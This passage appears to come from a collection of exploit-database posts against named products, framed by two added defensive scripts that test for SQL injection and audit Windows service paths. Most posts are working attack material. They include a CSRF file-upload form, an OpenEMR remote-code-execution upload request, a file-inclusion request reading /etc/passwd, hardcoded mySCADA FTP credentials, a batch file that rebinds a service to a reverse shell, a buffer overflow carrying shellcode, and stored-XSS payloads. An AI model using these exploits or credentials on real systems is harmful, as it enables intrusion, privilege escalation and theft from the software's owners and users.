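Posts 2, 5 and 14 above all describe the same defect: a request value concatenated into SQL text. The following is an added example, not code from any of those posts or projects: it rebuilds the `users_tbl` login query from post 2 over an in-memory SQLite table (constructed, with one made-up account), runs the two payloads quoted in posts 2 and 5 plus the lone quote from post 14 against both the string-built query and a bound-parameter version, and labels each outcome. It is meant as a regression check a developer can keep next to the fixed code; note that SQLite, unlike MySQL, does not treat `#` as a comment, so that payload becomes a syntax error here rather than a bypass.

```python
import sqlite3
from typing import Callable, Dict, Tuple


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for users_tbl with one constructed account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users_tbl (username TEXT, password TEXT)")
    con.execute("INSERT INTO users_tbl VALUES ('admin', 'S3cret!')")
    return con


def login_vulnerable(con: sqlite3.Connection, uname: str, pwd: str) -> bool:
    # Same construction as the index.php snippet in post 2: request values are
    # pasted into the SQL text, so a quote in the input ends the string literal
    # and the rest of the input becomes SQL.
    sql = "SELECT * FROM users_tbl WHERE username='%s' AND password='%s'" % (uname, pwd)
    return con.execute(sql).fetchone() is not None


def login_fixed(con: sqlite3.Connection, uname: str, pwd: str) -> bool:
    # Bound parameters: the driver passes the values separately from the SQL,
    # so quotes and comment markers inside them are just characters to compare.
    # (Passwords should also be stored hashed; omitted to keep the contrast sharp.)
    sql = "SELECT * FROM users_tbl WHERE username=? AND password=?"
    return con.execute(sql, (uname, pwd)).fetchone() is not None


def classify(login: Callable[[sqlite3.Connection, str, str], bool],
             con: sqlite3.Connection, uname: str, pwd: str) -> str:
    """Outcome label for one submission: 'bypass' (row returned without the real
    credentials), 'rejected', or 'error' (malformed SQL, the tell-tale that
    post 14 points out for a lone single quote)."""
    try:
        ok = login(con, uname, pwd)
    except sqlite3.OperationalError:
        return "error"
    return "bypass" if ok else "rejected"


# Constructed inputs: the payloads quoted in posts 2 and 5, and post 14's lone quote.
PROBES: Dict[str, Tuple[str, str]] = {
    "comment-dash": ("' or 1=1 -- ", "anything"),
    "comment-hash": ("' or '1'='1'#", "blah123"),  # '#' comments in MySQL, is a syntax error in SQLite
    "lone-quote": ("'", "x"),
}


def run_probes(login: Callable[[sqlite3.Connection, str, str], bool]) -> Dict[str, str]:
    """Run every probe against a fresh database and return name -> outcome."""
    con = make_db()
    return {name: classify(login, con, u, p) for name, (u, p) in PROBES.items()}


if __name__ == "__main__":
    print("string-built query:", run_probes(login_vulnerable))
    print("bound parameters:  ", run_probes(login_fixed))
```

The fixed version still returns True for the genuine credentials, which is what a test suite should assert alongside the rejected probes; the same `?` placeholder pattern applies to MySQLi prepared statements in the PHP code the posts quote.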
  15. # Exploit Title: Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
      # Google Dork: N/A
      # Date: 2020-06-20
      # Exploit Author: BKpatron
      # Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/
      # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip
      # Version: v1.0
      # Tested on: Win 10
      # CVE: N/A
      # my website: bkpatron.com

      # Vulnerability: This product is unprotected against CSRF vulnerabilities. The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. You can upload a PHP file here with CSRF.

      # CSRF PoC (add student, File Upload):
      <html>
        <body>
          <form enctype="multipart/form-data" method="POST" action="http://localhost/student_enrollment/admin/index.php?page=add-student">
            <label for="name">Student Name</label>
            <input name="name" type="text" id="name" value="" required=""><br/>
            <label for="roll">Student Roll</label>
            <input name="roll" type="text" value="" pattern="[0-9]{6}" id="roll" required=""><br/>
            <label for="address">Student Address</label>
            <input name="address" type="text" value="" id="address" required=""><br/>
            <label for="pcontact">Parant Contact NO</label>
            <input name="pcontact" type="text" id="pcontact" pattern="01[5|6|7|8|9][0-9]{8}" value="" placeholder="01........." required=""><br/>
            <label for="class">Student Class</label>
            <select name="class" class="form-control" id="class" required=""><br/>
              <option>Select</option>
              <option value="1st">1st</option>
              <option value="2nd">2nd</option>
              <option value="3rd">3rd</option>
              <option value="4th">4th</option>
              <option value="5th">5th</option>
            </select><br/>
            <label for="photo">Student Photo</label>
            <input name="photo" type="file" id="photo" required=""><br/>
            <input name="addstudent" value="Add Student" type="submit" class="btn btn-danger">
          </form>
        </body>
      </html>

      #HTTP Request: http://localhost/student_enrollment/admin/index.php?page=add-student

      POST /student_enrollment/admin/index.php?page=add-student HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: multipart/form-data; boundary=---------------------------1586330740172
      Content-Length: 1669
      Referer: http://localhost/exploit2.php
      Cookie: _ga=GA1.1.1667382299.1577635358; PHPSESSID=2dhsgkdiavgfefp6g0qp63ruqe
      Connection: keep-alive
      Upgrade-Insecure-Requests: 1

      -----------------------------1586330740172: undefined
      Content-Disposition: form-data; name="name"

      bkpatron
      -----------------------------1586330740172
      Content-Disposition: form-data; name="roll"

      333000
      -----------------------------1586330740172
      Content-Disposition: form-data; name="address"

      0000
      -----------------------------1586330740172
      Content-Disposition: form-data; name="pcontact"

      01911111111
      -----------------------------1586330740172
      Content-Disposition: form-data; name="class"

      1st
      -----------------------------1586330740172
      Content-Disposition: form-data; name="photo"; filename="up.php"
      Content-Type: application/octet-stream

      ...

      // uploaded file path: http://localhost/student_enrollment/admin/images/your_file.php
  16. # Exploit Title: Code Blocks 20.03 - Denial Of Service (PoC)
      # Vendor Homepage: http://www.codeblocks.org/
      # Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03-setup.exe/download
      # Exploit Author: Paras Bhatia
      # Discovery Date: 2020-06-23
      # Vulnerable Software: Code Blocks
      # Version: 20.03
      # Vulnerability Type: Denial of Service (DoS)
      # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

      #Steps to Produce the Crash:
      # 1.- Run python code: CodeBlocksCrash.py
      # 2.- Copy content to clipboard
      # 3.- Open "codeblocks.exe"
      # 4.- In the "Management" section on left hand side, Click on "FSymbols" tab.
      # 5.- Select "Active project's symbols" from drop down "View:" menu.
      # 6.- Paste ClipBoard into the "Search:" field.
      # 7.- Press Enter from keyboard.
      # 8.- Crashed.

      ##################################################################################################################################################

      #Python "CodeBlocksCrash.py" Code:

      f= open("CodeBlocksCrash.txt", "w")
      payload="\x41" * 5000
      f.write(payload)
      f.close()
  17. # Exploit Title: Lansweeper 7.2 - Incorrect Access Control
      # SHODAN DORK : title:"Lansweeper - Login"
      # Date: 2020-06-14
      # Exploit Author: Amel BOUZIANE-LEBLOND
      # Vendor Homepage: https://www.lansweeper.com/
      # Software Link: https://www.lansweeper.com
      # Version: 6.0.x through 7.2.x
      # Tested on: Windows
      # CVE : CVE-2020-14011

      ### Title: Incorrect Access Control.
      ### Category: Exploit
      ### Severity: Critical

      ### Description:
      Lansweeper 6.0.x through 7.2.x has a default installation in which the admin password is configured for the admin account, unless "Built-in admin" is manually unchecked. This allows command execution via the Add New Package and Scheduled Deployments features.

      ### Other observation:
      Hi, this issue is kind of critical. By using Shodan with the filter title:"Lansweeper - Login" we will find some Lansweeper instances with the default installation on them.

      ### Details:
      The Lansweeper application is agentless network inventory software that can be used for IT asset management. It uses the ASP.NET technology on its web application.

      ### Analysis:
      When you install Lansweeper 6.0 or a more recent Lansweeper release and access the web console for the first time, you are presented with a First Run Wizard, which allows you to set up scanning and configure some basic options. Any subsequent times you access the console, you are presented with a login screen. By default, everyone in your network can access all of Lansweeper's features and menus simply by browsing to the web console URL and hitting the Built-in Admin button.

      ### Suggested mitigation:
      Restrict access to the console and configure what users can see or do once they've been granted access. You assign a built-in or custom user role, a set of permissions, to user groups or individual user accounts. A user's role determines what the user can see or do within the console.

      ### Impact/Risk:
      Remote code execution can expose the organization to unauthorized access of data and programs, fraud.

      --
      Amel BOUZIANE-LEBLOND
  18. # Exploit title: BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting
      # Exploit Author: William Summerhill
      # Date: 2020-06-22
      # Vendor homepage: https://www.globalradar.com/
      # Tested on: Windows
      # CVE-2020-14943

      # Description: The "Firstname" and "Lastname" parameters in Global RADAR BSA Radar 1.6.7234.X
      # are vulnerable to a stored Cross-Site Scripting (XSS) via the Update User Profile feature
      # (in the top-right of the application).

      # Proof of Concept:
      Using the "update user profile" feature in the top-right of the application while logged in, a malicious user can inject malicious, unencoded scripts, such as "<script>alert(1)</script>", into the Firstname and Lastname parameters of a user account. This stored XSS will execute on nearly every application page as these parameters are always present while logged in.

      This attack can be further leveraged by utilizing an existing authorization bypass exploit (CVE-2020-14944) to inject stored XSS payloads into these parameters for arbitrary existing user accounts.

      Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14943
  19. # Exploit Title: OpenEMR 5.0.1 - 'controller' Remote Code Execution
      # Date: 2020-06-22
      # Exploit Author: Emre ÖVÜNÇ
      # Vendor Homepage: https://www.open-emr.org/
      # Software Link: https://www.open-emr.org/wiki/index.php/OpenEMR_Downloads
      # Version: v5.0.1
      # Tested on: Linux
      # Link: https://github.com/EmreOvunc/OpenEMR_Vulnerabilities

      # PoC
      To exploit vulnerability, someone could use 'http://[HOST]/controller.php?document&upload&patient_id=00&parent_id=4&' post request to upload malicious php codes.

      POST /openemr-5.0.1/controller.php?document&upload&patient_id=00&parent_id=4& HTTP/1.1
      Host: [TARGET]
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://172.16.155.140/openemr-5.0.1/controller.php?document&upload&patient_id=00&parent_id=4&
      Content-Type: multipart/form-data; boundary=---------------------------141194333536146869123947219434
      Content-Length: 842
      Origin: http://172.16.155.140
      DNT: 1
      Connection: close
      Cookie: OpenEMR=t1lugo5qrbhv7mc2c3q9ricsnl; TreeMenuBranchStatus=objTreeMenu_1_node_1_9; PHPSESSID=dfhapc4v0bskt7pcpmc2j93agq; LS-VQGNEIWNPEBSNBWE=6rm848pgjj78hhecpb9roo8af1; YII_CSRF_TOKEN=OWYyM0lybGFtRF9wcHRkZ1lldF9WblhoVHlVNk5HRW3WMnZhghJHNtBjyIuALM94Ww3gltGLoeKETBSfevfbCw%3D%3D
      Upgrade-Insecure-Requests: 1

      -----------------------------141194333536146869123947219434
      Content-Disposition: form-data; name="MAX_FILE_SIZE"

      64000000
      -----------------------------141194333536146869123947219434
      Content-Disposition: form-data; name="file[]"; filename="shell_info.php"
      Content-Type: text/php

      <?php phpinfo(); ?>
      -----------------------------141194333536146869123947219434
      Content-Disposition: form-data; name="destination"

      -----------------------------141194333536146869123947219434
      Content-Disposition: form-data; name="patient_id"

      00
      -----------------------------141194333536146869123947219434
      Content-Disposition: form-data; name="category_id"

      4
      -----------------------------141194333536146869123947219434
      Content-Disposition: form-data; name="process"

      true
      -----------------------------141194333536146869123947219434--
  20. # Exploit Title: FHEM 6.0 - Local File Inclusion
      # Date: 2020-02-10
      # Exploit Author: Emre ÖVÜNÇ
      # Vendor Homepage: https://fhem.de/
      # Software Link: https://fhem.de/#Download
      # Version: v6.0
      # Tested on: Windows
      # Link: https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability
      # PoC
      To exploit the vulnerability, someone could use the 'http://[HOST]/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text' request to get some information from the target by changing the "file" parameter.

      GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1
      Host: [TARGET]
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      DNT: 1
      Connection: close
      Upgrade-Insecure-Requests: 1
  21. # Exploit Title: mySCADA myPRO v7 Hardcoded Credentials
      # Date: 2018-07-02
      # Exploit Author: Emre ÖVÜNÇ
      # Vendor Homepage: http://myscada.org
      # Software Link: https://www.myscada.org/mypro/
      # Version: v7.0.45
      # Tested on: Windows/Linux
      # CVE-2018-11311
      # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311
      # https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password
      # PoC
      ftp [IP] 2121
      username: myscada
      password: Vikuk63
  22. # Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
      # Date: 2020-06-26
      # Exploit Author: Ethan Seow
      # Vendor Homepage: https://windscribe.com
      # Version: v1.83 Build 20
      # Tested on: Microsoft Windows 10 Home 10.0.18363 Build 18363
      #filename : exploit.bat
      #Code start
      @echo off
      sc config WindscribeService binPath="cmd /k {PATH TO REVERSE SHELL e.g. C:\Users\Public\payload.exe}"
      sc stop WindscribeService
      sc start WindscribeService
      echo Exploit success! SYSTEM reverse shell should be triggered :DDDDD
      pause
      #Code end
  23. # Exploit Title: KiteService 1.2020.618.0 - Unquoted Service Path
      # Discovery by: PoisonSk
      # Discovery Date: 2020-06-23
      # Vendor Homepage: https://www.kite.com/
      # Software Link : https://www.kite.com/download/
      # Tested Version: 1.2020.618.0
      # Vulnerability Type: Unquoted Service Path
      # Tested on OS: Microsoft Windows 10 Home Single 10.0.18363 N/D Compilación 18363
      # Steps to discover unquoted Service Path:
      C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i "program " | findstr /i /v """
      KiteService    KiteService    C:\Program Files\Kite\KiteService.exe    Auto

      C:\Users>sc qc KiteService
      [SC] QueryServiceConfig CORRECTO

      NOMBRE_SERVICIO: KiteService
              TIPO                  : 10  WIN32_OWN_PROCESS
              TIPO_INICIO           : 2   AUTO_START
              CONTROL_ERROR         : 0   IGNORE
              NOMBRE_RUTA_BINARIO   : C:\Program Files\Kite\KiteService.exe
              GRUPO_ORDEN_CARGA     :
              ETIQUETA              : 0
              NOMBRE_MOSTRAR        : KiteService
              DEPENDENCIAS          :
              NOMBRE_INICIO_SERVICIO: LocalSystem
      # Exploit:
      # A successful attempt would require that the local attacker insert an executable file in the path of the service.
      # Upon service restart or system reboot, the malicious code will be run with elevated privileges.
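As an added audit check (not part of PoisonSk's post or of any vendor's code), the following Python script parses the kind of `wmic service get name,pathname,startmode,startname` listing shown above, flags every service whose binary path is unquoted and contains spaces, and lists the directories an administrator has to confirm are not writable by standard users. It relies on the documented CreateProcess behaviour for an unquoted command line: the prefix up to each space is tried as the executable, with `.exe` appended when that prefix has no extension. The KiteService row reproduces the path reported in the post; the other service names and paths are constructed sample values.

```python
import ntpath
import re
from dataclasses import dataclass, field

# One row of `wmic service get name,pathname,startmode,startname` output:
# service name, binary path (may contain spaces or be quoted), start mode, account.
LINE_RE = re.compile(
    r"^(?P<name>\S+)\s+(?P<path>.+?)\s+"
    r"(?P<mode>Auto|Manual|Disabled|Boot|System)\s+(?P<account>\S+)\s*$"
)

# Constructed sample listing modelled on the wmic output in the post above.
# KiteService is the path reported there; the other rows are made up.
SAMPLE_WMIC = r"""
Name                    PathName                                                   StartMode  StartName
KiteService             C:\Program Files\Kite\KiteService.exe                      Auto       LocalSystem
ExampleMonitor          C:\Program Files\Example Bandwidth Monitor\monsvc.exe      Auto       LocalSystem
QuotedSvc               "C:\Program Files\Example Vendor\svc.exe" -run             Auto       LocalSystem
Spooler                 C:\Windows\System32\spoolsv.exe                            Auto       LocalSystem
"""


@dataclass
class Finding:
    name: str
    path: str
    account: str
    # Files Windows would look for before reaching the real binary.
    candidates: list = field(default_factory=list)


def is_unquoted_with_spaces(path: str) -> bool:
    """A quoted path is unambiguous; an unquoted one containing spaces is not."""
    p = path.strip()
    return not p.startswith('"') and " " in p


def hijack_candidates(path: str) -> list:
    r"""For an unquoted command line, Windows tries the prefix up to each space
    as the executable, appending .exe when that prefix has no extension
    (e.g. C:\Program.exe, then C:\Program Files\Example.exe, ...)."""
    out = []
    for i, ch in enumerate(path):
        if ch == " ":
            prefix = path[:i]
            if not ntpath.splitext(prefix)[1]:
                prefix += ".exe"
            out.append(prefix)
    return out


def audit_wmic_output(text: str) -> list:
    """Parse the listing and return one Finding per unquoted, space-containing path."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header, blank, or unparseable row
        path = m.group("path").strip()
        if is_unquoted_with_spaces(path):
            findings.append(Finding(m.group("name"), path, m.group("account"),
                                    hijack_candidates(path)))
    return findings


def writable_check_points(finding: Finding) -> list:
    """Directories an auditor must confirm deny write/create to standard users:
    if any of them is writable, a file dropped there runs under the service account."""
    dirs = []
    for cand in finding.candidates:
        d = ntpath.dirname(cand)
        if d not in dirs:
            dirs.append(d)
    return dirs


def report(text: str) -> str:
    """Human-readable summary of the audit."""
    lines = []
    for f in audit_wmic_output(text):
        lines.append(f"{f.name} ({f.account}): {f.path}")
        for d in writable_check_points(f):
            lines.append(f"    verify no standard-user write access: {d}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_WMIC))
```

On a real host, pipe the output of the `wmic` command into `audit_wmic_output` and then check each reported directory with `icacls`; the quoted `QuotedSvc` row and the space-free `Spooler` row are correctly left out of the report.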
  24. # Exploit Title: RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)
      # Exploit Author: Paras Bhatia
      # Discovery Date: 2020-06-29
      # Vulnerable Software: RM Downloader
      # Software Link Download: https://github.com/x00x00x00x00/RMDownloader_2.50.60/raw/master/RMDownloader.exe
      # Version: 2.50.60 2006.06.23
      # Vulnerability Type: Local Buffer Overflow
      # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
      # Proof of Concept:
      # 1.- Run the python script, it will create a new file "RM_LCE.txt"
      # 2.- Copy the content of the new file 'RM_LCE.txt' to clipboard
      # 3.- Turn off DEP for RMDownloader.exe
      # 4.- Open 'RMDownloader.exe'
      # 5.- Go to 'Load' tab
      # 6.- Paste clipboard in 'Load' parameter
      # 7.- Click on button 'OK'
      # 8.- Two messageboxes will pop up, click OK
      # 9.- Calc.exe runs.
      #################################################################################################################################################
      #Python "RM_LCE.py" Code:
      # Written for Python 2, where a str holds raw bytes and the file receives the exact byte values.

      f = open("RM_LCE.txt", "w")

      junk = "\x41" * 336
      egg = "w00tw00t"

      # msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -b "\x0a\x0d\x00"
      buf = ""
      buf += "\xd9\xeb\xb8\xfa\x38\xad\x4f\xd9\x74\x24\xf4\x5a\x29"
      buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xee\xda"
      buf += "\x58\xb3\xe6\x99\xa3\x4c\xf6\xfd\x2a\xa9\xc7\x3d\x48"
      buf += "\xb9\x77\x8e\x1a\xef\x7b\x65\x4e\x04\x08\x0b\x47\x2b"
      buf += "\xb9\xa6\xb1\x02\x3a\x9a\x82\x05\xb8\xe1\xd6\xe5\x81"
      buf += "\x29\x2b\xe7\xc6\x54\xc6\xb5\x9f\x13\x75\x2a\x94\x6e"
      buf += "\x46\xc1\xe6\x7f\xce\x36\xbe\x7e\xff\xe8\xb5\xd8\xdf"
      buf += "\x0b\x1a\x51\x56\x14\x7f\x5c\x20\xaf\x4b\x2a\xb3\x79"
      buf += "\x82\xd3\x18\x44\x2b\x26\x60\x80\x8b\xd9\x17\xf8\xe8"
      buf += "\x64\x20\x3f\x93\xb2\xa5\xa4\x33\x30\x1d\x01\xc2\x95"
      buf += "\xf8\xc2\xc8\x52\x8e\x8d\xcc\x65\x43\xa6\xe8\xee\x62"
      buf += "\x69\x79\xb4\x40\xad\x22\x6e\xe8\xf4\x8e\xc1\x15\xe6"
      buf += "\x71\xbd\xb3\x6c\x9f\xaa\xc9\x2e\xf5\x2d\x5f\x55\xbb"
      buf += "\x2e\x5f\x56\xeb\x46\x6e\xdd\x64\x10\x6f\x34\xc1\xee"
      buf += "\x25\x15\x63\x67\xe0\xcf\x36\xea\x13\x3a\x74\x13\x90"
      buf += "\xcf\x04\xe0\x88\xa5\x01\xac\x0e\x55\x7b\xbd\xfa\x59"
      buf += "\x28\xbe\x2e\x3a\xaf\x2c\xb2\x93\x4a\xd5\x51\xec"

      nseh = "\xeb\x06\x90\x90"

      # 1002C531  5B  POP EBX
      # 1002C532  58  POP EAX
      # 1002C533  C3  RETN
      # C:\Program Files\RM Downloader\RDutility02.dll
      seh = "\x31\xc5\x02\x10"

      nops = "\x90" * 20

      egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
      egghunter += "\x77\x30\x30\x74"  # this is the marker/tag: w00t
      egghunter += "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

      payload = junk + egg + buf + nseh + seh + nops + egghunter
      f.write(payload)
      f.close()
  25. # Exploit Title: Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting
      # Google Dork: N/A
      # Date: 2020-06-28
      # Exploit Author: Anushree Priyadarshini
      # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
      # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
      # Version: 1.0
      # Tested on: Windows 10
      # CVE: CVE-2020-15599

      Description: The form parameters 'user_firstname' and 'user_lastname' are vulnerable to stored cross-site scripting.

      Payload for 'user_firstname' : <script>alert(1)</script>
      Payload for 'user_lastname' : <script>alert(2)</script>

      POST /CMSsite-master/register.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.93 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.9,en-GB;q=0.8,en-CA;q=0.7,zh-CN;q=0.6,zh-HK;q=0.5,zh-SG;q=0.4,zh-TW;q=0.3,ja;q=0.2,ko;q=0.1
      Accept-Encoding: gzip, deflate
      Referer: http://localhost/CMSsite-master/register.php
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 190
      Connection: close
      Cookie: PHPSESSID=491d4jir62vldd0u84knd1m1fi
      Upgrade-Insecure-Requests: 1

      user_name=DemoUser&user_firstname=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&user_lastname=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&user_email=Hack%40gmail.com&user_password=1234&register=